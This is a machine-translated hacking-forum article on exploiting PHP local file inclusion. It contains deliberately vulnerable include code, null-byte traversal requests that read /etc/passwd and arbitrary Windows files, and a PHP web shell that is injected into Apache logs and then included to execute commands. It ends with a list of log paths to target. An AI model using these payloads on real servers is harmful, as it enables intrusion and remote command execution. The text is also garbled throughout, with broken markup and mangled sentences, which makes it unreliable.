PHP local file inclusion(LFI)exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62201233079
Type myhack58
Reporter 佚名
Modified 2012-02-11T00:00:00


This study main references are:

Experimental code:

If you are on linux, be submitted directly to: test. php? for=/etc/passwd%0 0 to display the file.

<? php

include($_GET['for'].‘. php’);//for testing local include vulnerability

?& gt;

If it is on win, submit: test. php? for=D:\tools\readme. txt%0 0, You can, cross-directory, cross-drive. It should be noted here, for too many”..\”, the 3 6 0 will automatically intercept, the better way is to use ie or ff.

But just browsing the files is not enough, we also need to webshell。 You can use the log injection method. This is also I made this recording of the main object, which is the point.

Here, the idea of core is to the php code injected into the log, for example, we can:

<? php $s=$_GET;@chdir($s['x']);echo @system($s['y'])?& gt;

Injected into the browser automatically changes too annoying to. Note: friddle2 will not be on for the machine to access the filter, I just input the machine address: it.

Then the access: test. php? for=/var/log/apache/logs/error_log%0 0&x=/&y=uname, this is for linux. If the platform is switched to win, you can access: test. php? for=..\apache\logs\error. log%0 0&x=. y=dir displays the current directory files.

Of course, we can also log to access. log in, but that will be more complicated, because need to the files it contains will be greater.

References are also mentioned: the use of linux/proc/self/fd injection method, I'm on linux not familiar with, so it does not take a closer look, after the need of the time and then understand it.

Additional discovery:

3 6 0 browser there is a strange feature, when accessing the http://www. baidu. com/search/error. html%0 0../../../../../../tools, will visit directory: D:\Program files\360se\tools see that there is no this folder, is there a problem here? TDH

D:\Program files\360se\360se3\http:\apache\logs\error. log%0 0&y=dir and 8/test. php? for=..\..\..\apache\logs\error. log%0 0&y=dir, the relationship between the two is how much?


1, May log path,

/etc/httpd/logs/access. log


/etc/httpd/logs/error. log






/usr/local/apache/logs/access. log


/usr/local/apache/logs/error. log







/var/log/apache/access. log

/var/log/apache/error. log

/var/log/apache-ssl/access. log

/var/log/apache-ssl/error. log



/var/log/httpsd/ssl. access_log





/var/www/logs/access. log


/var/www/logs/error. log




C:\Program Files\Apache Group\Apache\logs\access. log

C:\Program Files\Apache Group\Apache\logs\error. log

C:\program files\wamp\apache2\logs





Excerpted from